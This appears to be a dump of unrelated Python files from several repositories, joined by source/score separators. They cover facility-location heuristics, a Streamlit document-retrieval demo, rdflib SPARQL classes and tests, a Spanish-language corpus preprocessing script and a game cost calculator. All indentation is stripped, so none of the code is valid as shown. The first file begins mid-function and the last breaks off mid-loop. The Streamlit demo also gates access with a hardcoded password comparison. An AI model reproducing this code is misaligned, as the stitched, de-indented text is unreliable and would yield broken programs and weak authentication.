col_sum_tuple = [] # Tie col_sum with index.
for i in range(len(col_sum)):
tup = (i, col_sum[i])
col_sum_tuple.append(tup)
col_sum_tuple.sort(key=lambda x: x[1])
col_sum_tuple = col_sum_tuple[: 2 * p] # Choose the top 2p based on distance.
p_list_set = [col_sum_tuple[i : i + p] for i in range(p)]
return p_list_set
def candidate_place(
pb: pd.DataFrame, distance: pd.DataFrame, p_list_set: List[List]
) -> List:
"""
Explanation
Only names are extracted from DataFrame having a minimal distance within each set.
Args:
pb: DataFrame for public facilities.
distance: DataFrame about the distance between F and L
p_list_set: In distance, a set of p lists grouped by p based on distance
Return:
List: List of names of p public facilities.
"""
min_sum_list = [] # take the minimum values in the pth list.
for i in range(len(p_list_set)):
tup_check = []
for j in p_list_set[i]:
tup_check.append(f"F_{j[0]}")
check_df = distance[tup_check]
check_df["min"] = 0 # generate 'min' column
for k in range(len(check_df)):
k_th_row = check_df.iloc[k][:-1] # exclude 'min' column
check_df["min"][k] = min(k_th_row)
min_sum_value = sum(check_df["min"])
min_sum_list.append(min_sum_value)
final_index = min_sum_list.index(min(min_sum_list))
final_set = p_list_set[final_index]
final_set.sort(key=lambda x: x[0])
final_idx = [idx for idx, dist in final_set]
final_market_data = pb.iloc[final_idx, :]
final_market_data.reset_index(drop=True, inplace=True)
name_list = [name for name in final_market_data["name"]]
return name_list
def top_value(char_list: List) -> int:
"""Heuristic Method with P-Median
Explanation
Get the top three to six. (If there is a duplicate value, bring up to six.)
Args:
char_list: A list of the names of the final candidates.
Return:
int: The number of final candidates to get
"""
appearance_candidate = list(pd.Series(char_list).value_counts())
num_of_candidate = 3
for first, second in zip(appearance_candidate[2:], appearance_candidate[3:]):
if first == second:
num_of_candidate += 1
else:
break
return num_of_candidate
def make_finalset(market_data: pd.DataFrame, char_list: List) -> pd.DataFrame:
"""Heuristic Method with P-Median
Explanation
After receiving the char_list, which is the list of the final candidates,
The final candidates is mapped with public facility data
to return a DataFrame containing only the final candidates.
Args:
market_data: Data containing market location information.
char_list: The list with the names of the final candidates overlapped.
Return:
Pandas DataFrame: The final DataFrame containing the names, latitudes, and longitude of the final candidates.
"""
num_of_candidate = top_value(char_list)
final_name_list = pd.Series(char_list).value_counts().index[:num_of_candidate]
market_index = [
(market_data[market_data["name"] == name].index)[0] for name in final_name_list
]
market_final = market_data.iloc[market_index, :]
market_final.reset_index(drop=True, inplace=True)
return market_final
if __name__ == "__main__":
# Insert your own data
pf_location_path = "../data/울진군예상좌표.xlsx" # market: 지역_공공공장소/위도/경도
population_location_path = "../data/울진_편의점.csv" # population: 지역_유동인구/위도/경도
# Dataset Upload
pf_data = preprocess_data(pf_location_path)
population_data = preprocess_data(population_location_path)
# Chnage Coordinate
pf_data = coordinate_change(pf_data, "epsg:4326", "epsg:5178")
population_data = coordinate_change(population_data, "epsg:4326", "epsg:5178")
# Calculate Distance between public facilities and floating poplulation
distance = shortest_distance(pf_data, population_data)
# Using Heuristic P-Median
char_list = []
for p in range(3, 11):
p_list = p_list_set(distance, p)
name_list = candidate_place(pf_data, distance, p_list)
char_list.extend(name_list)
pf_final = make_finalset(pf_data, char_list)
pf_final = coordinate_change(pf_final, "epsg:5178", "epsg:4326")
print(pf_final)
``` |
{
"source": "jjonhwa/Retrieval_Streamlit_Demo",
"score": 2
} |
#### File: jjonhwa/Retrieval_Streamlit_Demo/app.py
```python
import streamlit as st
import yaml
import torch
from loading import load_q_encoder, load_c_encoder, load_p_embedding, get_tokenizer
from encoder import BertEncoder_For_BiEncoder, RoBertaEncoder_For_CrossEncoder
from utils import Passage_Embedding
from rerank import get_relavant_doc, rerank
from confirm_button_hack import cache_on_button_press
st.set_page_config(layout="wide")
BertEncoder = BertEncoder_For_BiEncoder
RoBertaEncoder = RoBertaEncoder_For_CrossEncoder
if "q_encoder" not in st.session_state:
with st.spinner("Uploading.."):
with open("config.yaml") as f:
config = yaml.load(f, Loader=yaml.FullLoader)
st.session_state.p_embs = load_p_embedding()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
st.session_state.q_encoder = load_q_encoder()
st.session_state.corpus = Passage_Embedding(
config["wikipedia_path"], p_encoder=None
).get_corpus()
st.session_state.tokenizer = get_tokenizer()
st.session_state.c_encoder = load_c_encoder()
def main():
p_embs = st.session_state.p_embs
q_encoder = st.session_state.q_encoder
c_encoder = st.session_state.c_encoder
tokenizer = st.session_state.tokenizer
corpus = st.session_state.corpus
text_input = st.text_input("질문을 입력해주세요.")
st.write(text_input)
# query = "나폴레옹이 죽은 날짜는?"
query = [text_input]
k = 5
if st.button("자세히 찾기"):
st.write("약 1분 정도 소요됩니다.")
with st.spinner("Please wait.."):
k_plus = k * 10
doc_scores, doc_indices = get_relavant_doc(
q_encoder, tokenizer, query, p_embs, k=k_plus
)
result_scores, result_indices = rerank(
query, c_encoder, doc_indices, corpus, tokenizer
)
# get final Top-k Passages: Here, I just get 50 passage
final_indices = []
for i in range(len(doc_indices)):
t_list = [doc_indices[i][result_indices[i][j]] for j in range(k)]
final_indices.append(t_list)
st.write("-------------------------------------")
for i in range(k):
st.write(corpus[final_indices[0][i]])
st.write("-------------------------------------")
if st.button("빠르게 찾기"):
with st.spinner("Please wait.."):
doc_scores, doc_indices = get_relavant_doc(
q_encoder, tokenizer, query, p_embs, k=k
)
# st.write(corpus[doc_indices[0][0]])
st.write("-------------------------------------")
for i in range(k):
st.write(corpus[doc_indices[0][i]])
st.write("-------------------------------------")
root_password = "<PASSWORD>"
password = st.text_input(
"AI BoostCamp 2기! Product Serving Master는 누구인가요?", type="password"
)
@cache_on_button_press("Authenticate")
def authenticate(password) -> bool:
return password == root_password
if authenticate(password):
st.success("성공!")
st.title("Retrieve Document about Question")
main()
else:
st.error("부스트캠프 AI Tech 2기 멤버가 아닌가요?")
``` |
{
"source": "jjon/rdflib",
"score": 3
} |
#### File: plugins/sparql/sparql.py
```python
import collections
import datetime
import itertools
import typing as t
from typing import Any, Container, Dict, Iterable, List, Optional, Tuple, Union
import isodate
import rdflib.plugins.sparql
from rdflib.compat import Mapping, MutableMapping
from rdflib.graph import ConjunctiveGraph, Graph
from rdflib.namespace import NamespaceManager
from rdflib.plugins.sparql.parserutils import CompValue
from rdflib.term import BNode, Identifier, Literal, Node, URIRef, Variable
class SPARQLError(Exception):
def __init__(self, msg: Optional[str] = None):
Exception.__init__(self, msg)
class NotBoundError(SPARQLError):
def __init__(self, msg: Optional[str] = None):
SPARQLError.__init__(self, msg)
class AlreadyBound(SPARQLError):
"""Raised when trying to bind a variable that is already bound!"""
def __init__(self):
SPARQLError.__init__(self)
class SPARQLTypeError(SPARQLError):
def __init__(self, msg: Optional[str]):
SPARQLError.__init__(self, msg)
class Bindings(MutableMapping):
"""
A single level of a stack of variable-value bindings.
Each dict keeps a reference to the dict below it,
any failed lookup is propegated back
In python 3.3 this could be a collections.ChainMap
"""
def __init__(self, outer: Optional["Bindings"] = None, d=[]):
self._d: Dict[str, str] = dict(d)
self.outer = outer
def __getitem__(self, key: str) -> str:
if key in self._d:
return self._d[key]
if not self.outer:
raise KeyError()
return self.outer[key]
def __contains__(self, key: Any) -> bool:
try:
self[key]
return True
except KeyError:
return False
def __setitem__(self, key: str, value: Any) -> None:
self._d[key] = value
def __delitem__(self, key: str) -> None:
raise Exception("DelItem is not implemented!")
def __len__(self) -> int:
i = 0
d: Optional[Bindings] = self
while d is not None:
i += len(d._d)
d = d.outer
return i
def __iter__(self):
d = self
while d is not None:
yield from d._d
d = d.outer
def __str__(self) -> str:
# type error: Generator has incompatible item type "Tuple[Any, str]"; expected "str"
return "Bindings({" + ", ".join((k, self[k]) for k in self) + "})" # type: ignore[misc]
def __repr__(self) -> str:
return str(self)
class FrozenDict(Mapping):
"""
An immutable hashable dict
Taken from http://stackoverflow.com/a/2704866/81121
"""
def __init__(self, *args: Any, **kwargs: Any):
self._d: Dict[Identifier, Identifier] = dict(*args, **kwargs)
self._hash: Optional[int] = None
def __iter__(self):
return iter(self._d)
def __len__(self) -> int:
return len(self._d)
def __getitem__(self, key: Identifier) -> Identifier:
return self._d[key]
def __hash__(self) -> int:
# It would have been simpler and maybe more obvious to
# use hash(tuple(sorted(self._d.items()))) from this discussion
# so far, but this solution is O(n). I don't know what kind of
# n we are going to run into, but sometimes it's hard to resist the
# urge to optimize when it will gain improved algorithmic performance.
if self._hash is None:
self._hash = 0
for key, value in self.items():
self._hash ^= hash(key)
self._hash ^= hash(value)
return self._hash
def project(self, vars: Container[Variable]) -> "FrozenDict":
return FrozenDict((x for x in self.items() if x[0] in vars))
def disjointDomain(self, other: t.Mapping[Identifier, Identifier]) -> bool:
return not bool(set(self).intersection(other))
def compatible(self, other: t.Mapping[Identifier, Identifier]) -> bool:
for k in self:
try:
if self[k] != other[k]:
return False
except KeyError:
pass
return True
def merge(self, other: t.Mapping[Identifier, Identifier]) -> "FrozenDict":
res = FrozenDict(itertools.chain(self.items(), other.items()))
return res
def __str__(self) -> str:
return str(self._d)
def __repr__(self) -> str:
return repr(self._d)
class FrozenBindings(FrozenDict):
def __init__(self, ctx: "QueryContext", *args, **kwargs):
FrozenDict.__init__(self, *args, **kwargs)
self.ctx = ctx
def __getitem__(self, key: Union[Identifier, str]) -> Identifier:
if not isinstance(key, Node):
key = Variable(key)
if not isinstance(key, (BNode, Variable)):
return key
if key not in self._d:
# type error: Value of type "Optional[Dict[Variable, Identifier]]" is not indexable
# type error: Invalid index type "Union[BNode, Variable]" for "Optional[Dict[Variable, Identifier]]"; expected type "Variable"
return self.ctx.initBindings[key] # type: ignore[index]
else:
return self._d[key]
def project(self, vars: Container[Variable]) -> "FrozenBindings":
return FrozenBindings(self.ctx, (x for x in self.items() if x[0] in vars))
def merge(self, other: t.Mapping[Identifier, Identifier]) -> "FrozenBindings":
res = FrozenBindings(self.ctx, itertools.chain(self.items(), other.items()))
return res
@property
def now(self) -> datetime.datetime:
return self.ctx.now
@property
def bnodes(self) -> t.Mapping[Identifier, BNode]:
return self.ctx.bnodes
@property
def prologue(self) -> Optional["Prologue"]:
return self.ctx.prologue
def forget(
self, before: "QueryContext", _except: Optional[Container[Variable]] = None
):
"""
return a frozen dict only of bindings made in self
since before
"""
if not _except:
_except = []
# bindings from initBindings are newer forgotten
return FrozenBindings(
self.ctx,
(
x
for x in self.items()
if (
x[0] in _except
# type error: Unsupported right operand type for in ("Optional[Dict[Variable, Identifier]]")
or x[0] in self.ctx.initBindings # type: ignore[operator]
or before[x[0]] is None
)
),
)
def remember(self, these):
"""
return a frozen dict only of bindings in these
"""
return FrozenBindings(self.ctx, (x for x in self.items() if x[0] in these))
class QueryContext(object):
"""
Query context - passed along when evaluating the query
"""
def __init__(
self,
graph: Optional[Graph] = None,
bindings: Optional[Union[Bindings, FrozenBindings, List[Any]]] = None,
initBindings: Optional[Dict[Variable, Identifier]] = None,
):
self.initBindings = initBindings
self.bindings = Bindings(d=bindings or [])
if initBindings:
self.bindings.update(initBindings)
self.graph: Optional[Graph]
self._dataset: Optional[ConjunctiveGraph]
if isinstance(graph, ConjunctiveGraph):
self._dataset = graph
if rdflib.plugins.sparql.SPARQL_DEFAULT_GRAPH_UNION:
self.graph = self.dataset
else:
self.graph = self.dataset.default_context
else:
self._dataset = None
self.graph = graph
self.prologue: Optional[Prologue] = None
self._now: Optional[datetime.datetime] = None
self.bnodes: t.MutableMapping[Identifier, BNode] = collections.defaultdict(
BNode
)
@property
def now(self) -> datetime.datetime:
if self._now is None:
self._now = datetime.datetime.now(isodate.tzinfo.UTC)
return self._now
def clone(
self, bindings: Optional[Union[FrozenBindings, Bindings, List[Any]]] = None
) -> "QueryContext":
r = QueryContext(
self._dataset if self._dataset is not None else self.graph,
bindings or self.bindings,
initBindings=self.initBindings,
)
r.prologue = self.prologue
r.graph = self.graph
r.bnodes = self.bnodes
return r
@property
def dataset(self) -> ConjunctiveGraph:
""" "current dataset"""
if self._dataset is None:
raise Exception(
"You performed a query operation requiring "
+ "a dataset (i.e. ConjunctiveGraph), but "
+ "operating currently on a single graph."
)
return self._dataset
def load(self, source: URIRef, default: bool = False, **kwargs):
def _load(graph, source):
try:
return graph.parse(source, format="turtle", **kwargs)
except Exception:
pass
try:
return graph.parse(source, format="xml", **kwargs)
except Exception:
pass
try:
return graph.parse(source, format="n3", **kwargs)
except Exception:
pass
try:
return graph.parse(source, format="nt", **kwargs)
except Exception:
raise Exception(
"Could not load %s as either RDF/XML, N3 or NTriples" % source
)
if not rdflib.plugins.sparql.SPARQL_LOAD_GRAPHS:
# we are not loading - if we already know the graph
# being "loaded", just add it to the default-graph
if default:
# Unsupported left operand type for + ("None")
self.graph += self.dataset.get_context(source) # type: ignore[operator]
else:
if default:
_load(self.graph, source)
else:
_load(self.dataset, source)
def __getitem__(self, key) -> Any:
# in SPARQL BNodes are just labels
if not isinstance(key, (BNode, Variable)):
return key
try:
return self.bindings[key]
except KeyError:
return None
def get(self, key: Variable, default: Optional[Any] = None):
try:
return self[key]
except KeyError:
return default
def solution(self, vars: Optional[Iterable[Variable]] = None) -> FrozenBindings:
"""
Return a static copy of the current variable bindings as dict
"""
if vars:
return FrozenBindings(
self, ((k, v) for k, v in self.bindings.items() if k in vars)
)
else:
return FrozenBindings(self, self.bindings.items())
def __setitem__(self, key: Identifier, value: Identifier) -> None:
if key in self.bindings and self.bindings[key] != value:
raise AlreadyBound()
self.bindings[key] = value
def pushGraph(self, graph: Optional[Graph]) -> "QueryContext":
r = self.clone()
r.graph = graph
return r
def push(self) -> "QueryContext":
r = self.clone(Bindings(self.bindings))
return r
def clean(self) -> "QueryContext":
return self.clone([])
def thaw(self, frozenbindings: FrozenBindings) -> "QueryContext":
"""
Create a new read/write query context from the given solution
"""
c = self.clone(frozenbindings)
return c
class Prologue:
"""
A class for holding prefixing bindings and base URI information
"""
def __init__(self):
self.base: Optional[str] = None
self.namespace_manager = NamespaceManager(Graph()) # ns man needs a store
def resolvePName(self, prefix: Optional[str], localname: Optional[str]) -> URIRef:
ns = self.namespace_manager.store.namespace(prefix or "")
if ns is None:
raise Exception("Unknown namespace prefix : %s" % prefix)
return URIRef(ns + (localname or ""))
def bind(self, prefix: Optional[str], uri: Any) -> None:
self.namespace_manager.bind(prefix, uri, replace=True)
def absolutize(
self, iri: Optional[Union[CompValue, str]]
) -> Optional[Union[CompValue, str]]:
"""
Apply BASE / PREFIXes to URIs
(and to datatypes in Literals)
TODO: Move resolving URIs to pre-processing
"""
if isinstance(iri, CompValue):
if iri.name == "pname":
return self.resolvePName(iri.prefix, iri.localname)
if iri.name == "literal":
# type error: Argument "datatype" to "Literal" has incompatible type "Union[CompValue, Identifier, None]"; expected "Optional[str]"
return Literal(
iri.string, lang=iri.lang, datatype=self.absolutize(iri.datatype) # type: ignore[arg-type]
)
elif isinstance(iri, URIRef) and not ":" in iri:
return URIRef(iri, base=self.base)
return iri
class Query:
"""
A parsed and translated query
"""
def __init__(self, prologue: Prologue, algebra: CompValue):
self.prologue = prologue
self.algebra = algebra
self._original_args: Tuple[str, Mapping[str, str], Optional[str]]
class Update:
"""
A parsed and translated update
"""
def __init__(self, prologue: Prologue, algebra: List[CompValue]):
self.prologue = prologue
self.algebra = algebra
self._original_args: Tuple[str, Mapping[str, str], Optional[str]]
```
#### File: rdflib/test/conftest.py
```python
import pytest
pytest.register_assert_rewrite("test.utils")
from rdflib import Graph
from .data import TEST_DATA_DIR
from .utils.earl import EarlReporter
pytest_plugins = [EarlReporter.__module__]
# This is here so that asserts from these modules are formatted for human
# readibility.
@pytest.fixture(scope="session")
def rdfs_graph() -> Graph:
return Graph().parse(TEST_DATA_DIR / "defined_namespaces/rdfs.ttl", format="turtle")
```
#### File: test/jsonld/runner.py
```python
import json
from rdflib import ConjunctiveGraph
from rdflib.compare import isomorphic
from rdflib.parser import InputSource
from rdflib.plugins.parsers.jsonld import JsonLDParser, to_rdf
# monkey-patch N-Quads parser via it's underlying W3CNTriplesParser to keep source bnode id:s ..
from rdflib.plugins.parsers.ntriples import W3CNTriplesParser, bNode, r_nodeid
from rdflib.plugins.serializers.jsonld import from_rdf
from rdflib.plugins.shared.jsonld.keys import CONTEXT, GRAPH
def _preserving_nodeid(self, bnode_context=None):
if not self.peek("_"):
return False
return bNode(self.eat(r_nodeid).group(1))
DEFAULT_PARSER_VERSION = 1.0
def make_fake_urlinputsource(input_uri, format=None, suite_base=None, options={}):
local_url = input_uri.replace("https://w3c.github.io/json-ld-api/tests/", "./")
try:
f = open(local_url, "rb")
except FileNotFoundError:
f = None
source = InputSource(input_uri)
source.setPublicId(input_uri)
source.setByteStream(f)
source.url = input_uri
source.links = []
if local_url.endswith((".jsonld", ".jldt")):
source.content_type = "application/ld+json"
else:
source.content_type = "application/json"
source.format = format
if options:
if "httpLink" in options:
source.links.append(options["httpLink"])
if "contentType" in options:
source.content_type = options["contentType"]
if "redirectTo" in options:
redir = suite_base + options["redirectTo"]
local_redirect = redir.replace(
"https://w3c.github.io/json-ld-api/tests/", "./"
)
if f:
f.close()
try:
f = open(local_redirect, "rb")
except FileNotFoundError:
f = None
source.setByteStream(f)
source.url = redir
source.setPublicId(redir)
source.setSystemId(redir)
return source
def do_test_json(suite_base, cat, num, inputpath, expectedpath, context, options):
input_uri = suite_base + inputpath
input_graph = ConjunctiveGraph()
if cat == "remote-doc":
input_src = make_fake_urlinputsource(
input_uri, format="json-ld", suite_base=suite_base, options=options
)
p = JsonLDParser()
p.parse(
input_src,
input_graph,
base=input_src.getPublicId(),
context_data=context,
generalized_rdf=True,
)
else:
input_obj = _load_json(inputpath)
to_rdf(
input_obj,
input_graph,
base=input_uri,
context_data=context,
generalized_rdf=True,
)
expected_json = _load_json(expectedpath)
use_native_types = True # CONTEXT in input_obj
result_json = from_rdf(
input_graph,
context,
base="./", # deliberately set base different to the input base
use_native_types=options.get("useNativeTypes", use_native_types),
use_rdf_type=options.get("useRdfType", False),
)
def _prune_json(data):
if CONTEXT in data:
data.pop(CONTEXT)
if GRAPH in data:
data = data[GRAPH]
# def _remove_empty_sets(obj):
return data
expected_json = _prune_json(expected_json)
result_json = _prune_json(result_json)
_compare_json(expected_json, result_json)
def do_test_parser(suite_base, cat, num, inputpath, expectedpath, context, options):
input_uri = suite_base + inputpath
input_obj = _load_json(inputpath)
old_nodeid = W3CNTriplesParser.nodeid
# monkey patch nodeid fn in NTriplesParser
W3CNTriplesParser.nodeid = _preserving_nodeid
try:
expected_graph = _load_nquads(expectedpath)
finally:
W3CNTriplesParser.nodeid = old_nodeid
result_graph = ConjunctiveGraph()
requested_version = options.get("specVersion")
version = DEFAULT_PARSER_VERSION
if requested_version:
if requested_version == "json-ld-1.1":
version = 1.1
elif requested_version == "json-ld-1.0":
version = 1.0
if cat == "remote-doc":
input_src = make_fake_urlinputsource(
input_uri, format="json-ld", options=options
)
p = JsonLDParser()
p.parse(
input_src,
result_graph,
base=input_uri,
context_data=context,
generalized_rdf=True,
)
else:
to_rdf(
input_obj,
result_graph,
context_data=context,
base=options.get("base", input_uri),
version=version,
generalized_rdf=options.get("produceGeneralizedRdf", False),
)
assert isomorphic(result_graph, expected_graph), "Expected:\n%s\nGot:\n%s" % (
expected_graph.serialize(),
result_graph.serialize(),
)
def do_test_serializer(suite_base, cat, num, inputpath, expectedpath, context, options):
input_uri = suite_base + inputpath
old_nodeid = W3CNTriplesParser.nodeid
# monkey patch nodeid fn in NTriplesParser
W3CNTriplesParser.nodeid = _preserving_nodeid
try:
input_graph = _load_nquads(inputpath)
finally:
W3CNTriplesParser.nodeid = old_nodeid
expected_json = _load_json(expectedpath)
result_json = from_rdf(
input_graph,
context,
base=input_uri,
use_native_types=options.get("useNativeTypes", False),
use_rdf_type=options.get("useRdfType", False),
)
_compare_json(expected_json, result_json)
def _load_nquads(source):
graph = ConjunctiveGraph()
with open(source) as f:
data = f.read()
graph.parse(data=data, format="nquads")
return graph
def _load_json(source):
with open(source) as f:
return json.load(f)
def _to_ordered(obj):
if isinstance(obj, list):
# NOTE: use type in key to handle mixed
# lists of e.g. bool, int, float.
return sorted(
(_to_ordered(lv) for lv in obj),
key=lambda x: (_ord_key(x), type(x).__name__),
)
if not isinstance(obj, dict):
return obj
return sorted((k, _to_ordered(v)) for k, v in obj.items())
def _ord_key(x):
if isinstance(x, dict) and "@id" in x:
return x["@id"]
else:
return x
def _dump_json(obj):
return json.dumps(
obj, indent=4, separators=(",", ": "), sort_keys=True, check_circular=True
)
def _compare_json(expected, result):
expected = json.loads(_dump_json(expected))
result = json.loads(_dump_json(result))
assert _to_ordered(expected) == _to_ordered(
result
), "Expected JSON:\n%s\nGot:\n%s" % (_dump_json(expected), _dump_json(result))
```
#### File: test/test_graph/test_slice.py
```python
from test.data import bob, cheese, hates, likes, michel, pizza, tarek
from rdflib import Graph
class TestGraphSlice:
def test_slice(self):
"""
We pervert the slice object,
and use start, stop, step as subject, predicate, object
all operations return generators over full triples
"""
def sl(x, y):
return len(list(x)) == y
def soe(x, y):
return set([a[2] for a in x]) == set(y) # equals objects
g = Graph()
g.add((tarek, likes, pizza))
g.add((tarek, likes, cheese))
g.add((michel, likes, pizza))
g.add((michel, likes, cheese))
g.add((bob, likes, cheese))
g.add((bob, hates, pizza))
g.add((bob, hates, michel)) # gasp!
# Single terms are all trivial:
# single index slices by subject, i.e. return triples((x,None,None))
# tell me everything about "tarek"
sl(g[tarek], 2)
# single slice slices by s,p,o, with : used to split
# tell me everything about "tarek" (same as above)
sl(g[tarek::], 2)
# give me every "likes" relationship
sl(g[:likes:], 5)
# give me every relationship to pizza
sl(g[::pizza], 3)
# give me everyone who likes pizza
sl(g[:likes:pizza], 2)
# does tarek like pizza?
assert g[tarek:likes:pizza] is True
# More intesting is using paths
# everything hated or liked
sl(g[: hates | likes], 7)
```
#### File: test/test_parsers/test_broken_parse_data_from_jena.py
```python
import os
from test.data import TEST_DATA_DIR
import pytest
import rdflib
# Recovered from
# https://github.com/RDFLib/rdflib/tree/6b4607018ebf589da74aea4c25408999f1acf2e2
broken_parse_data = os.path.join(TEST_DATA_DIR, "broken_parse_test")
@pytest.fixture
def xfail_broken_parse_data(request):
fname = request.getfixturevalue("testfile")
expected_failures = [
"n3-writer-test-02.n3",
"n3-writer-test-25.n3",
"rdf-test-01.n3",
"rdf-test-08.n3",
"rdf-test-10.n3",
"rdf-test-24.n3",
]
if fname in expected_failures:
request.node.add_marker(
pytest.mark.xfail(reason=f"Expected failure with {fname}")
)
@pytest.mark.parametrize("testfile", os.listdir(broken_parse_data))
@pytest.mark.usefixtures("xfail_broken_parse_data")
def test_n3_serializer_roundtrip(testfile) -> None:
g1 = rdflib.ConjunctiveGraph()
g1.parse(os.path.join(broken_parse_data, testfile), format="n3")
```
#### File: test/test_w3c_spec/test_nt_w3c.py
```python
import os
from test.data import TEST_DATA_DIR
from test.utils.manifest import RDFTest, read_manifest
from test.utils.namespace import RDFT
from typing import Callable, Dict
import pytest
from rdflib import Graph
from rdflib.term import Node, URIRef
verbose = False
def nt(test):
g = Graph()
try:
g.parse(test.action, format="nt")
if not test.syntax:
raise AssertionError("Input shouldn't have parsed!")
except:
if test.syntax:
raise
testers: Dict[Node, Callable[[RDFTest], None]] = {
RDFT.TestNTriplesPositiveSyntax: nt,
RDFT.TestNTriplesNegativeSyntax: nt,
}
@pytest.mark.parametrize(
"rdf_test_uri, type, rdf_test",
read_manifest(
os.path.join(TEST_DATA_DIR, "suites", "w3c/ntriples/manifest.ttl"), legacy=True
),
)
def test_manifest(rdf_test_uri: URIRef, type: Node, rdf_test: RDFTest):
testers[type](rdf_test)
``` |
{
"source": "jjonusas/Zapatista-discourse-nlp",
"score": 3
} |
#### File: src/data/make_dataset.py
```python
import os
import re
import pandas
import numpy
import spacy
import click
import logging
from pathlib import Path
from dotenv import find_dotenv, load_dotenv
from gensim.models.phrases import Phrases, Phraser
class RawCorpusIter:
""" An iterator of a raw corpus.
The iterator assumes that the raw corpus is a directory with every document
represented as a separate file within.
Args:
path_to_corpus (str): path to the directory containing the corpus
Returns:
iterator: when iterated this iterator returns a pair containing the name of
the file and the content of the file
"""
def __init__(self, path_to_corpus, info_freq = 10):
self.corpus_dir = path_to_corpus
self.files = os.listdir(self.corpus_dir)
self.logger = logging.getLogger(__name__)
self.info_freq = info_freq
def __iter__(self):
self.file_num = 0
return self
def __next__(self):
if self.file_num < len(self.files):
n = self.file_num
self.file_num += 1
with open(os.path.join(self.corpus_dir, self.files[n]), "r") as file:
if self.file_num % self.info_freq == 0:
self.logger.info(f"PROGRESS: prcessing file {self.file_num} of {len(self.files)}")
return(self.files[n], file.read())
else:
raise StopIteration
def convert_raw_corpus_to_df(path_to_corpus, clean = False):
""" Converts a raw corpus to a pandas dataframe.
The function assumes that the raw corpus is a directory with every document
represented as a separate file within. It returns a dataframe in which
every row corresponds to a single sentence in the corpus. The dataframe
contains columns 'document_index' and 'sentence_index' to uniquely identify
each sentence, as well as the column 'date' which corresponds to the date
when the document was published. If the flag <clean> is set to true, the sentences
in the data frame
Args:
path_to_corpus (str): path to the directory containing the corpus
clean (bool): flag whether to clean the sentence
Returns:
pandas.DataFrame: containing the corpus subdivided into sentences
"""
logger = logging.getLogger(__name__)
def is_accepted(token):
output = token.is_punct
output |= token.is_space
output |= token.is_stop
return not output
corpus = RawCorpusIter(path_to_corpus)
nlp = spacy.load("es_dep_news_trf", disable=['ner'])
raw_sentences = []
cleaned_sentences = []
sentence_indices = []
document_indices = []
dates = []
for document_id, (date, text) in enumerate(corpus):
# In the Zapatista corpus hypthen is often used to indicated
# speach instead of n-dash, but spacy does not recognise it as
# punctuation. Replace hypthen at the start of a sentence by an n-dash
text = re.sub('^-', '–', text)
text = re.sub('(\s)-', '\g<1>–', text)
doc = nlp(text)
sentence_index = 0
for sentence in doc.sents:
raw_sentence = sentence.text.strip()
if raw_sentence != "":
raw_sentences.append(raw_sentence)
sentence_indices.append(sentence_index)
sentence_index+=1
if clean:
filtered_words = [token.lemma_.lower() for token in sentence if is_accepted(token)]
cleaned_sentences.append(" ".join(filtered_words))
document_indices += [document_id] * sentence_index
dates += [pandas.to_datetime(date[:10])] * sentence_index
if clean:
df = pandas.DataFrame({'date':dates,
'document_index': document_indices,
'sentence_index': sentence_indices,
'raw_sentence': raw_sentences,
'cleaned_sentence': cleaned_sentences })
else:
df = pandas.DataFrame({'date':dates,
'document_index': document_indices,
'sentence_index': sentence_indices,
'raw_sentence': raw_sentences,
'date':dates})
size = len(df)
df = df[(df != '').all(1)]
logger.info(f'{size - len(df)} sentences were removed during cleaning')
return df
def combine_phrases_in_corpus(corpus_df, column, min_count=75, n = 1):
""" Use gensim phrases to find phrases in the corpus.
Args:
corpus_df (pandas.DataFrame): the input corpus
column (str): the name of the column to be processed
min_count (int): min_count hyperparameter of gensim module
"""
logger = logging.getLogger(__name__)
try:
sentences = [sent.split() for sent in corpus_df[column]]
except KeyError:
logger.error(f"{column} is not a name of a column of the input dataframe")
for i in range(n):
phrases_model = Phrases(sentences, min_count=min_count, progress_per=10000)
sentences = phrases_model[sentences]
sentences_with_phrases = [" ".join(sent) for sent in sentences]
corpus_df[column + "_with_phrases"] = sentences_with_phrases
@click.command()
@click.argument('input_filepath', type=click.Path(exists=True))
@click.argument('output_filepath', type=click.Path())
@click.option('--clean/--no-clean', default=False, help="Make the senteces lower case and remove punctuation")
@click.option('--phrases/--no-phrases', default=False, help="Combine commonly used phrases into a single token")
@click.option('--min_count', default=75, help="Min_count hyperparameter for gensim Phrases")
@click.option('--n', default=1, help="The number of times bigrams are obtained")
def main(input_filepath, output_filepath, clean, phrases, min_count, n):
""" Runs data processing scripts to turn raw data from (../raw) into
cleaned data ready to be analyzed (saved in ../processed).
"""
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# console handler for logging
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
# file handler for logging
file_handler = logging.FileHandler(output_filepath + ".log", encoding='utf-8')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.info('converting the raw data into a dataframe')
logger.info(f'raw data: {input_filepath}, clean: {clean}, detecet phrases: {phrases}, min_count: {min_count}, bigram iterations: {n}')
df = convert_raw_corpus_to_df(input_filepath, clean)
if clean and phrases:
logger.info('combining phrases into tokens')
combine_phrases_in_corpus(df, 'cleaned_sentence',min_count = min_count, n = n)
df.to_csv(output_filepath, index=False)
if __name__ == '__main__':
# not used in this stub but often useful for finding various files
project_dir = Path(__file__).resolve().parents[2]
# find .env automagically by walking up directories until it's found, then
# load up the .env entries as environment variables
load_dotenv(find_dotenv())
main()
``` |
{
"source": "jjoo914/rival_regions_calc",
"score": 3
} |
#### File: rival_regions_calc/rival_regions_calc/construction_costs.py
```python
from . import Building
class ConstructionCosts():
"""Calculate resources needed to raise building levels in region"""
building = 0
current = 0
cash = 0
oil = 0
ore = 0
gold = 0
uranium = 0
diamond = 0
def __init__(self, building, current):
"""Initialize WorkProduction"""
if not isinstance(building, Building) or not isinstance(current, int):
raise TypeError
self.building = building
self.current = current
def calculate(self, build_plus):
"""Calculate resources you need based on new buildings"""
if not isinstance(build_plus, int):
raise TypeError
build_total = self.current + build_plus
building_id = self.building.building_id
if building_id in (1, 2, 3):
for i in range(self.current + 1, build_total + 1):
self.cash += round(pow(i * 300, 1.5))
self.oil += round(pow(i * 160, 1.5))
self.ore += round(pow(i * 90, 1.5))
self.gold += round(pow(i * 2160, 1.5))
self.diamond += round(pow(i * 0, 1.5))
self.uranium += round(pow(i * 0, 1))
elif building_id in (4, 5, 8):
for i in range(self.current + 1, build_total + 1):
self.cash += round(pow(i * 1000, 1.5))
self.oil += round(pow(i * 10, 1.5))
